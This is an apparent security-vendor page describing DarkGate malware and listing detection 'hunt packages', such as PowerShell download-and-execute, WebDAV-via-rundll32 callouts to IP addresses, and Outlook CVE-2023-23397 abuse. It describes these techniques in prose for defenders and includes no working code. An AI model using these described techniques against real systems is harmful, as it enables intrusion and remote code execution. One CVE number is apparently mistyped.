Threat Overview - DarkGate Malware
DarkGate malware variant was first observed in the wild in 2018 (seemingly in production since 2017), evolving into a more dangerous and widespread version of itself in recent years - more notably after the takedown of the Qbot infrastructure, there has been a surge in cases involving the variant. DarkGate is a malicious toolkit that operates under the Malware-as-a-Service model (meaning it is sold or rented to threat actors), and understood to have the functionality of both a loader and a RAT (Remote Access Trojan).
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Hunt Packages
Direct to IP Address in Execution of WebDav DLL via Rundll32 - Malicious Link or Exploitation
This Hunt Package focuses on identifying attempts by attackers to coax Microsoft applications, LOLB or similar applications to utilize WebDav to communicate over HTTP to attacker controlled infrastructure. In recent reports, attackers have exclusively utilized direct to IP communication for their WebDAV addresses. As such, the provided query syntax looks for the composition of an IP structured like a UNC path within the execution of rundll32 to create a WebDAV session. This activity has been observed in several vulnerabilities, such as CVE-2023-22397, CVE-2023-36025 and CVE-2024-21412. Web Distributed Authoring and Versioning (WebDav) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In typical use, WebDav provides a convenient means for file sharing and collaboration. WebDav can be abused by adversaries to execute arbitrary code and perform other malicious activities, such as specially crafted links in websites and phishing emails, and Internet Shortcuts.
WMIC Windows Internal Discovery and Enumeration
This will identify the potentially malicious use of WMI (Windows Management Interface) utilized for local enumeration and discovery of a host.
HTTP Request and Shell Execution Commands - Potential Download and Execute Command
PowerShell and Windows Shell can be utilized to download files and execute them via VBA code to obfuscate their actions and potentially bypass security controls. The hypothesis for this Hunt Package identifies when cmd.exe or powershell.exe are utilized to perform a web request and subsequently execute through the "Shell.Application" function in VBA. This technique was employed by the targeted attacks reported by TrueSec against Microsoft Teams users, to deploy the DarkGate malware.
Common Suspicious Powershell Execution Argument Techniques
This Hunt Package is designed to identify suspicious PowerShell execution arguments in order to search for potentially malicious activities that may deviate from standard practices within a specific environment. This can help the analyst discover abnormal or harmful events that are leveraging PowerShell for various purposes, such as launching attacks or maintaining persistence.
Powershell Download and Execute Dropper Behavior - Separate Command Calls
This package identifies the use of PowerShell to pull down a payload and execute it. This is similar to activity observed in association with SysJoker's Dropper for Windows where the Powershell commands are broken up as individual execution calls.
Windows cmd.exe Launching Script Interpreter
The intent of the provided query logic is to look for the execution of cscript.exe or wscript.exe processes, with a parent of cmd.exe. Attackers often abuse these LOLBs to launch scripts and other malicious commands in an attempt to hide with legitimate activity or bypass defenses.
Potentially Abnormal Parent Process for cmd.exe or regedit.exe
This use case is meant to identify suspicious parent processes for cmd.exe and regedit.exe.
Abnormal Execution of WebDav DLL via Rundll32 - Potentially Malicious Link or Exploitation
This Hunt Package focuses on identifying attempts by attackers to coax Microsoft applications, LOLB or similar applications to utilize WebDav to communicate over HTTP to attacker controlled infrastructure. In March 2023, Microsoft issued a patch for the vulnerability tracked as CVE-2023-23397, which was a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends an appointment with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server. In addition to SMB, it was found ports and services could be forced, such as WebDav over SSL:443 or HTTP:80. Web Distributed Authoring and Versioning (WebDav) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In typical use, WebDav provides a convenient means for file sharing and collaboration. WebDav can be abused by adversaries to execute arbitrary code and perform other malicious activities. In this particular case, attackers may send malicious calendar invites or appointments, which trigger the "reminder notification" sound for the proposed meeting or event. As a result, Outlook will initiate a connection to the configured address found in the "PidLidReminderFileParameter" appointment MAPI field.